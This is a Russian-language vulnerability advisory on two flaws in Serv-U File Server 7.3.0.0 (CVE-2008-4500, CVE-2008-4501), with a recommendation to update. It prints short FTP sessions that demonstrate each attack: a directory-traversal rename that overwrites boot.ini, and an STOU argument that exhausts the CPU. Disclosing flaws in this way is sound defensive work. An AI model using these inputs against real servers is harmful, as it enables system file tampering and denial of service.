Несколько уязвимостей в Serv-U File Server

Дата публикации:
07.10.2008
Дата изменения:
29.03.2009
Всего просмотров:
2712
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2008-4500
CVE-2008-4501
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Serv-U File Server 7.x
Уязвимые версии: Serv-U File Server 7.3.0.0, возможно более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании и скомпрометировать целевую систему.

1. Уязвимость существует из-за недостаточной проверки входных данных в службе FTP при переименовании файлов. Удаленный пользователь может с помощью символов обхода каталога перезаписать или создать произвольные файлы на системе. Пример:

220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
2. Уязвимость существует из-за ошибки в FTP команде "STOU". Удаленный пользователь может с помощью специально сформированного аргумента команды потребить все доступные процессорные ресурсы. Пример:

220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
stou con:1
quit
221 Goodbye, closing session.

URL производителя: www.serv-u.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
29.03.2009
Изменена секция "Решение"

Ссылки: http://milw0rm.com/exploits/6660
http://milw0rm.com/exploits/6661

или введите имя

CAPTCHA